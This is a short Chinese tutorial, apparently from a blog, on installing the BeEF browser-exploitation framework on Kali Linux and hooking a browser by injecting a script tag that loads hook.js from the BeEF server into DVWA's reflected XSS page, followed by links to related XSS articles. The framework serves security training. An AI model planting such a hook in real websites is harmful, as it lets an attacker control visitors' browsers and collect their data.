在kali环境下安装Beef-Xss靶场搭建

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)


一、更新安装包

┌──(root㉿kali)-[/home/kali]

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)-[/home/kali]

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]

└─# cd /usr/share/beef-xss

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# ls -al

┌──(root㉿kali)-[/usr/share/beef-xss]

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

此时BEEF中监控已经上线:

可获取http请求头,服务器类型,IP地址等信息

攻击连接意图:

相关推荐
Fly不安全5 小时前
HackTheBox靶机:Sightless;NodeJS模板注入漏洞,盲XSS跨站脚本攻击漏洞实战
网络·安全·web安全·web·xss·hackthebox·模板注入
泷羽Sec-pp5 小时前
XSS靶场通关详解
服务器·网络·xss
Koi慢热6 小时前
XSS (XSS)分类
前端·xss
莫名有雪6 小时前
BUUCTF_Web( XSS COURSE 1)xss
前端·xss
德迅云安全-小钱13 小时前
跨站脚本攻击(XSS)原理及防护方案
前端·网络·xss
dal118网工任子仪17 小时前
61,【1】BUUCTF WEB BUU XSS COURSE 11
前端·数据库·xss
H轨迹H1 天前
DVWA靶场XSS漏洞通关教程及源码审计
网络安全·渗透测试·xss·dvwa·web漏洞
doubt。1 天前
【BUUCTF】BUU XSS COURSE 11
笔记·学习·安全·web安全·网络安全·web·xss
小龙.nice2 天前
每日进步一点点(网安)
xss
黑客老陈4 天前
基于 Electron 应用的安全测试基础 — 提取和分析 .asar 文件
运维·服务器·前端·javascript·网络·electron·xss